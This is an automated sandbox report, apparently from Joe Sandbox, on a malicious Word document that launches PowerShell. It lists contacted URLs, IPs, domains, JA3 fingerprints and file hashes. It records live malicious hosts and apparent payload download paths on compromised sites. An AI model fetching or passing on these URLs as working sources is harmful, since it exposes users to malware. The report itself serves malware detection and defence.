                                        http://certs.godaddy.com/repository/1301powershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpfalse
                                          		high
                                          https://contoso.com/Iconpowershell.exe, 00000005.00000002.342905639.0000019242254000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                            		high
                                            https://www.odwebp.svc.msEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://api.powerbi.com/v1.0/myorg/groupsEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                              		high
                                              https://web.microsoftstream.com/video/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                		high
                                                https://certs.godaddy.com/repository/0powershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://www.calltorepair.com/project/world-business/powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                  • Avira URL Cloud: phishing
                                                  		unknown
                                                  https://graph.windows.netEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                    		high
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://crl.godaddy.com/gdroot-g2.crl0Fpowershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://www.calltorepair.com/wp-content/themes/thefox/includes/Flexslider/flexslider.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                        • Avira URL Cloud: phishing
                                                        		unknown
                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                          		high
                                                          https://www.calltorepair.com/wp-content/themes/thefox/includes/zilla-likes/styles/zilla-likes.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          		unknown
                                                          https://www.calltorepair.com/wp-content/themes/thefox/includes/prettyPhoto/css/prettyPhoto.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          		unknown
                                                          https://ncus.contentsync.EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://adm.tools/support/powershell.exe, 00000005.00000002.338722577.00000192326F9000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                              		high
                                                              http://weather.service.msn.com/data.aspxEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                		high
                                                                https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo.pngpowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                • Avira URL Cloud: phishing
                                                                		unknown
                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                  		high
                                                                  https://www.calltorepair.com/wp-json/powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                  • Avira URL Cloud: phishing
                                                                  		unknown
                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                    		high
                                                                    https://www.calltorepair.com/wp-content/uploads/2021/01/big_mob_logo-1.pngpowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                    • Avira URL Cloud: phishing
                                                                    		unknown
                                                                    https://wus2.contentsync.EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://clients.config.office.net/user/v1.0/iosEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                      		high
                                                                      http://certificates.godaddy.com/repository/0powershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://www.calltorepair.com/wp-content/themes/thefox/js/html5.jspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                        • Avira URL Cloud: phishing
                                                                        		unknown
                                                                        https://o365auditrealtimeingestion.manage.office.comEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                          		high
                                                                          https://outlook.office365.com/api/v1.0/me/ActivitiesEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                            		high
                                                                            https://clients.config.office.net/user/v1.0/android/policiesEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                              		high
                                                                              https://entitlement.diagnostics.office.comEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                		high
                                                                                https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/js/rs6.min.jspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                • Avira URL Cloud: phishing
                                                                                		unknown
                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                  		high
                                                                                  https://outlook.office.com/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                    		high
                                                                                    https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreatupowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                    • Avira URL Cloud: phishing
                                                                                    		unknown
                                                                                    https://storage.live.com/clientlogs/uploadlocationEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                      		high
                                                                                      https://www.calltorepair.com/wp-content/themes/thefox/css/animations.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                      • Avira URL Cloud: phishing
                                                                                      		unknown
                                                                                      https://www.calltorepair.com/project/luv-summer/powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                      • Avira URL Cloud: phishing
                                                                                      		unknown
                                                                                      https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.jspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                      • Avira URL Cloud: phishing
                                                                                      		unknown
                                                                                      https://graph.windows.net/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                        		high
                                                                                        https://devnull.onenote.comEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                          		high
                                                                                          https://messaging.office.com/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                            		high
                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                              		high
                                                                                              https://skyapi.live.net/Activity/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://www.calltorepair.com/wp-content/themes/thefox/css/thefox_js_composer.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                              • Avira URL Cloud: phishing
                                                                                              		unknown
                                                                                              https://giatot365.compowershell.exe, 00000005.00000002.340780682.0000019232C21000.00000004.00000001.sdmptrue
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://giatot365.com/wp-content/uploads/2powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmptrue
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://api.cortana.aiEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                                		high
                                                                                                https://www.calltorepair.com/wp-admin/admin-ajax.phppowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                                • Avira URL Cloud: phishing
                                                                                                		unknown
                                                                                                https://www.calltorepair.com/xmlrpc.php?rsdpowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                                • Avira URL Cloud: phishing
                                                                                                		unknown
                                                                                                https://staging.cortana.aiEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://opheliasbrewery.compowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://onedrive.live.com/embed?EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                                  		high
                                                                                                  https://augloop.office.comEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                                    		high
                                                                                                    https://www.calltorepair.com/about-us/powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                                    • Avira URL Cloud: phishing
                                                                                                    		unknown
                                                                                                    http://giatot365.compowershell.exe, 00000005.00000002.340780682.0000019232C21000.00000004.00000001.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/css/rs6.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                                    • Avira URL Cloud: phishing
                                                                                                    		unknown
                                                                                                    https://www.calltorepair.com/wp-content/themes/thefox/style_end.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                                    • Avira URL Cloud: phishing
                                                                                                    		unknown
                                                                                                    https://www.calltorepair.com/wp-includes/css/dist/block-library/style.min.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                                    • Avira URL Cloud: phishing
                                                                                                    		unknown
                                                                                                    https://api.diagnostics.office.comEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                                      		high
                                                                                                      https://store.office.de/addinstemplateEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                                        		high
                                                                                                        https://wus2.pagecontentsync.EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://api.powerbi.com/v1.0/myorg/datasetsEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                                          		high
                                                                                                          https://www.calltorepair.com/project/great-project/powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                                          • Avira URL Cloud: phishing
                                                                                                          		unknown
                                                                                                          https://cortana.ai/apiEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://cherkashchanu.compowershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://servicios.semperti.compowershell.exe, 00000005.00000002.338722577.00000192326F9000.00000004.00000001.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown

                                                                                                          Contacted IPs

                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs

                                                                                                          Public

                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          139.180.215.83
                                                                                                          		xuanthinhshop.comUnited States
                                                                                                          		20473AS-CHOOPAUStrue
                                                                                                          185.104.45.33
                                                                                                          		cherkashchanu.comUkraine
                                                                                                          		200000UKRAINE-ASUAtrue
                                                                                                          107.180.2.185
                                                                                                          		calltorepair.comUnited States
                                                                                                          		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                          151.106.5.169
                                                                                                          		tongdaihanoi.comGermany
                                                                                                          		29066VELIANET-ASvelianetInternetdiensteGmbHDEtrue
                                                                                                          103.28.39.103
                                                                                                          		giatot365.comViet Nam
                                                                                                          		131353NHANHOA-AS-VNNhanHoaSoftwarecompanyVNtrue
                                                                                                          35.209.212.48
                                                                                                          		opheliasbrewery.comUnited States
                                                                                                          		19527GOOGLE-2UStrue

                                                                                                          General Information

                                                                                                          Joe Sandbox Version:31.0.0 Emerald
                                                                                                          Analysis ID:369338
                                                                                                          Start date:16.03.2021
                                                                                                          Start time:14:25:56
                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                          Overall analysis duration:0h 6m 20s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Sample file name:Adjunto K_23165.doc
                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                          Run name:Potential for more IOCs and behavior
                                                                                                          Number of analysed new started processes analysed:28
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • HDC enabled
                                                                                                          • GSI enabled (VBA)
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.evad.winDOC@7/15@9/6
                                                                                                          EGA Information:Failed
                                                                                                          HDC Information:Failed
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 67%
                                                                                                          • Number of executed functions: 10
                                                                                                          • Number of non-executed functions: 4
                                                                                                          Cookbook Comments:
                                                                                                          • Adjust boot time
                                                                                                          • Enable AMSI
                                                                                                          • Found application associated with file extension: .doc
                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                          • Found warning dialog
                                                                                                          • Click Ok
                                                                                                          • Attach to Office via COM
                                                                                                          • Scroll down
                                                                                                          • Close Viewer
                                                                                                          Warnings:
                                                                                                          Show All
                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 104.42.151.234, 23.211.6.115, 52.109.32.63, 52.109.8.24, 52.109.76.33, 52.255.188.83, 13.88.21.125, 23.57.80.111, 51.11.168.160, 2.20.142.209, 2.20.142.210, 51.103.5.186, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129
                                                                                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 6388 because it is empty
                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                          Simulations

                                                                                                          Behavior and APIs

                                                                                                          TimeTypeDescription
                                                                                                          14:27:06API Interceptor31x Sleep call for process: powershell.exe modified

                                                                                                          Joe Sandbox View / Context

                                                                                                          IPs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          139.180.215.83Adjunto K_23165.docGet hashmaliciousBrowse
                                                                                                            185.104.45.33Adjunto K_23165.docGet hashmaliciousBrowse
                                                                                                            • cherkashchanu.com/Z:/4ZE8/
                                                                                                            107.180.2.185Adjunto K_23165.docGet hashmaliciousBrowse
                                                                                                              SecuriteInfo.com.W97M.DownLoader.5028.13042.docGet hashmaliciousBrowse
                                                                                                                Informacion 122020 N-98239.docGet hashmaliciousBrowse
                                                                                                                  151.106.5.169Adjunto K_23165.docGet hashmaliciousBrowse
                                                                                                                  • tongdaihanoi.com/847346324234234/rpnvXm/
                                                                                                                  103.28.39.103Adjunto K_23165.docGet hashmaliciousBrowse
                                                                                                                    Informacion 122020 N-98239.docGet hashmaliciousBrowse
                                                                                                                      INFO.docGet hashmaliciousBrowse
                                                                                                                        35.209.212.48SecuriteInfo.com.W97M.DownLoader.5028.13042.docGet hashmaliciousBrowse
                                                                                                                        • opheliasbrewery.com/wp-includes/ciAjcgj/

                                                                                                                        Domains

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                        opheliasbrewery.comAdjunto K_23165.docGet hashmaliciousBrowse
                                                                                                                        • 35.208.137.128
                                                                                                                        SecuriteInfo.com.W97M.DownLoader.5028.13042.docGet hashmaliciousBrowse
                                                                                                                        • 35.209.212.48
                                                                                                                        xuanthinhshop.comAdjunto K_23165.docGet hashmaliciousBrowse
                                                                                                                        • 139.180.215.83
                                                                                                                        tongdaihanoi.comAdjunto K_23165.docGet hashmaliciousBrowse
                                                                                                                        • 151.106.5.169
                                                                                                                        Archivo-2020-98864.docGet hashmaliciousBrowse
                                                                                                                        • 112.78.2.74
                                                                                                                        calltorepair.comSecuriteInfo.com.W97M.DownLoader.5028.13042.docGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        Informacion 122020 N-98239.docGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        giatot365.comAdjunto K_23165.docGet hashmaliciousBrowse
                                                                                                                        • 103.28.39.103
                                                                                                                        Informacion 122020 N-98239.docGet hashmaliciousBrowse
                                                                                                                        • 103.28.39.103
                                                                                                                        INFO.docGet hashmaliciousBrowse
                                                                                                                        • 103.28.39.103
                                                                                                                        cherkashchanu.comAdjunto K_23165.docGet hashmaliciousBrowse
                                                                                                                        • 185.104.45.33

                                                                                                                        ASN

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                        UKRAINE-ASUAAdjunto K_23165.docGet hashmaliciousBrowse
                                                                                                                        • 185.104.45.33
                                                                                                                        QUOTATION.xlsxGet hashmaliciousBrowse
                                                                                                                        • 185.68.16.173
                                                                                                                        QUOTATION.xlsxGet hashmaliciousBrowse
                                                                                                                        • 185.68.16.173
                                                                                                                        ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                                                        • 185.104.45.146
                                                                                                                        Purchasing List 0202021.docGet hashmaliciousBrowse
                                                                                                                        • 185.104.45.46
                                                                                                                        LOI.exeGet hashmaliciousBrowse
                                                                                                                        • 194.247.13.97
                                                                                                                        7UA1651581370.xlsmGet hashmaliciousBrowse
                                                                                                                        • 185.68.16.179
                                                                                                                        test9.exeGet hashmaliciousBrowse
                                                                                                                        • 185.68.16.210
                                                                                                                        SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.20877.rtfGet hashmaliciousBrowse
                                                                                                                        • 185.68.16.40
                                                                                                                        mb10.exeGet hashmaliciousBrowse
                                                                                                                        • 185.68.16.39
                                                                                                                        mb10.exeGet hashmaliciousBrowse
                                                                                                                        • 185.68.16.39
                                                                                                                        http://mjk-s.com.ua/wp-content/multifunctional_module/external_profile/j2v4gnkgki_y47879vx/Get hashmaliciousBrowse
                                                                                                                        • 185.68.16.20
                                                                                                                        L5xudZSpVV.docGet hashmaliciousBrowse
                                                                                                                        • 185.68.16.20
                                                                                                                        L5xudZSpVV.docGet hashmaliciousBrowse
                                                                                                                        • 185.68.16.20
                                                                                                                        adEk5sVMp4.docGet hashmaliciousBrowse
                                                                                                                        • 185.68.16.20
                                                                                                                        ga9fG4BxR7.docGet hashmaliciousBrowse
                                                                                                                        • 185.68.16.20
                                                                                                                        adEk5sVMp4.docGet hashmaliciousBrowse
                                                                                                                        • 185.68.16.20
                                                                                                                        ga9fG4BxR7.docGet hashmaliciousBrowse
                                                                                                                        • 185.68.16.20
                                                                                                                        V54Y7pqGrU.docGet hashmaliciousBrowse
                                                                                                                        • 185.68.16.20
                                                                                                                        5zzM0jY7ky.docGet hashmaliciousBrowse
                                                                                                                        • 185.68.16.20
                                                                                                                        AS-CHOOPAUSAdjunto K_23165.docGet hashmaliciousBrowse
                                                                                                                        • 139.180.215.83
                                                                                                                        Company profile.exeGet hashmaliciousBrowse
                                                                                                                        • 45.76.27.130
                                                                                                                        unpacked.exeGet hashmaliciousBrowse
                                                                                                                        • 45.32.138.49
                                                                                                                        haleng.exeGet hashmaliciousBrowse
                                                                                                                        • 207.246.80.14
                                                                                                                        530000.exeGet hashmaliciousBrowse
                                                                                                                        • 104.238.188.98
                                                                                                                        POCS1570.xlsxGet hashmaliciousBrowse
                                                                                                                        • 45.77.78.61
                                                                                                                        POCS1570.xlsxGet hashmaliciousBrowse
                                                                                                                        • 45.77.78.61
                                                                                                                        PDC_156280_5635_ALF.xlsxGet hashmaliciousBrowse
                                                                                                                        • 45.77.78.61
                                                                                                                        GetUserNames.EXEGet hashmaliciousBrowse
                                                                                                                        • 78.141.210.78
                                                                                                                        PDC_156280_5635_ALF.xlsxGet hashmaliciousBrowse
                                                                                                                        • 45.77.78.61
                                                                                                                        2021_03_04.exe.exeGet hashmaliciousBrowse
                                                                                                                        • 45.63.92.9
                                                                                                                        packet426.exeGet hashmaliciousBrowse
                                                                                                                        • 107.191.45.186
                                                                                                                        PAYMENT-FB21026518_10493_PINQ_202102161.xlsxGet hashmaliciousBrowse
                                                                                                                        • 45.77.78.61
                                                                                                                        PAYMENT-FB21026518_10493_PINQ_202102161.xlsxGet hashmaliciousBrowse
                                                                                                                        • 45.77.78.61
                                                                                                                        ORDER_2020_54.xlsxGet hashmaliciousBrowse
                                                                                                                        • 45.77.78.61
                                                                                                                        ORDER_2020_54.xlsxGet hashmaliciousBrowse
                                                                                                                        • 45.77.78.61
                                                                                                                        6f0000.exeGet hashmaliciousBrowse
                                                                                                                        • 136.244.108.143
                                                                                                                        UmFXBfylHx.docxGet hashmaliciousBrowse
                                                                                                                        • 149.28.152.49
                                                                                                                        UmFXBfylHx.docxGet hashmaliciousBrowse
                                                                                                                        • 149.28.152.49
                                                                                                                        OMUDY6GMZI.exeGet hashmaliciousBrowse
                                                                                                                        • 45.76.172.113

                                                                                                                        JA3 Fingerprints

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0ePurchase Order.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        SecuriteInfo.com.Trojan.PWS.Stealer.29934.17809.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        NewOrder20527.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        RFLinkClient-2.30.0.29010.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        5gS1ZiVlSw.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        SecuriteInfo.com.Variant.Razy.803564.32187.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        DMAipyp8Qd.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        f76RDb9vm6.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        pcKhfy4rvU.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        SecuriteInfo.com.Trojan.PWS.Siggen2.61780.11290.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        SecuriteInfo.com.Trojan.GenericKD.36276772.23649.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        U1bBBCbWZ1.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        New Order.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        SecuriteInfo.com.Trojan.PWS.Siggen2.62670.17922.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        SecuriteInfo.com.Trojan.GenericKD.45862691.7587.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        SecuriteInfo.com.Trojan.GenericKD.36452518.2355.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        SecuriteInfo.com.W32.AIDetect.malware2.12561.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        SecuriteInfo.com.W32.AIDetect.malware2.17251.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        unpacked.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185
                                                                                                                        WknSFDcbckSWaOKzgGLUFEXl.exeGet hashmaliciousBrowse
                                                                                                                        • 107.180.2.185

                                                                                                                        Dropped Files

                                                                                                                        No context

                                                                                                                        Created / dropped Files

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\EBBBFCCB-40A6-407F-8E1B-936E8948873B
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):133001
                                                                                                                        Entropy (8bit):5.376739745523053
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:1cQceNquBXA3gBwJpQ9DQW+zA9H34ZldpKWXboOilXNErLdRE9:BcQ9DQW+zUXi0
                                                                                                                        MD5:068DD2137AFF2EB9116089CF2D2EAFE9
                                                                                                                        SHA1:8B3C10793DBAF0D5588D6DF555F27B8E56CF2386
                                                                                                                        SHA-256:8F7356E8A92A0B88C0D61EDBF7F5B3B727D671199B6EC644E5554DBE8AE89806
                                                                                                                        SHA-512:B51EB3D57D05875C74292CCD83917EF8FE8591D40207EB8E081655FC0C91454278A1DB8B69163246CABBFB28E3E5569CC7ACCFDE49BBD85883B7D8CA3C28241F
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-03-16T13:26:54">.. Build: 16.0.13915.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{42576B78-1BBE-4166-930A-DE1BE0BE8F85}.tmp
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1536
                                                                                                                        Entropy (8bit):1.3708412074519778
